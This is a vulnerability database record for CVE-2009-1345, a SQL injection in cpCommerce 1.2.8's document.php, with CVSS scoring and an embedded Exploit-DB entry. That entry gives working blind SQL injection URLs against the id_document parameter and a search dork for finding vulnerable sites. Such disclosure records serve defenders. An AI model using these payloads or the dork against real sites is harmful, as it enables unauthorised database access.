ID CVE-2009-1345Type cveReporter cve@mitre.orgModified 2017-09-29T01:34:00
Description
SQL injection vulnerability in document.php in cpCommerce 1.2.8 allows remote attackers to execute arbitrary SQL commands via the id_document parameter.
{"id": "CVE-2009-1345", "bulletinFamily": "NVD", "title": "CVE-2009-1345", "description": "SQL injection vulnerability in document.php in cpCommerce 1.2.8 allows remote attackers to execute arbitrary SQL commands via the id_document parameter.", "published": "2009-04-20T14:30:00", "modified": "2017-09-29T01:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1345", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/8455", "http://www.securitytracker.com/id?1022082", "https://exchange.xforce.ibmcloud.com/vulnerabilities/49901", "http://www.securityfocus.com/bid/34556"], "cvelist": ["CVE-2009-1345"], "type": "cve", "lastseen": "2021-02-02T05:40:01", "edition": 4, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:8455"]}], "modified": "2021-02-02T05:40:01", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-02-02T05:40:01", "rev": 2}, "vulnersScore": 7.7}, "cpe": ["cpe:/a:cpcommerce:cpcommerce:1.2.8"], "affectedSoftware": [{"cpeName": "cpcommerce:cpcommerce", "name": "cpcommerce", "operator": "eq", "version": "1.2.8"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:cpcommerce:cpcommerce:1.2.8:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:cpcommerce:cpcommerce:1.2.8:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "cpcommerce-document-sql-injection(49901)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/49901"}, {"name": "1022082", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id?1022082"}, {"name": "34556", "refsource": "BID", "tags": ["Exploit"], "url": "http://www.securityfocus.com/bid/34556"}, {"name": "8455", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/8455"}]}
{"exploitdb": [{"lastseen": "2016-02-01T05:34:45", "description": "cpCommerce 1.2.8 (id_document) Blind SQL Injection Vulnerability. CVE-2009-1345. Webapps exploit for php platform", "published": "2009-04-16T00:00:00", "type": "exploitdb", "title": "cpCommerce 1.2.8 id_document Blind SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1345"], "modified": "2009-04-16T00:00:00", "id": "EDB-ID:8455", "href": "https://www.exploit-db.com/exploits/8455/", "sourceData": "==========================================================================================\n\n\n [o] cpCommerce 1.2.8 Blind SQL Injection Vulnerability\n\n Software : cpCommerce version 1.2.8\n Vendor : http://cpcommerce.cpradio.org/\n Download : http://cpcommerce.cpradio.org/downloads.php\n Author : NoGe\n Contact : noge[dot]code[at]gmail[dot]com\n Blog : http://evilc0de.blogspot.com\n\n\n==========================================================================================\n\n\n [o] Vulnerable file\n\n document.php\n\n\n\n [o] Exploit\n\n http://localhost/[path]/document.php?id_document=[SQL]\n http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4\n http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5\n\n\n\n [o] Dork\n\n \"Powered by cpcommerce\"\n\n\n==========================================================================================\n\n\n [o] Greetz\n\n MainHack BrotherHood [ http://serverisdown.org ]\n OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang\n H312Y yooogy mousekill }^-^{ loqsa zxvf\n skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke\n Special for Vrs-hCk [ thx cuy.. :p ]\n\n \n==========================================================================================\n\n# milw0rm.com [2009-04-16]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8455/"}]}
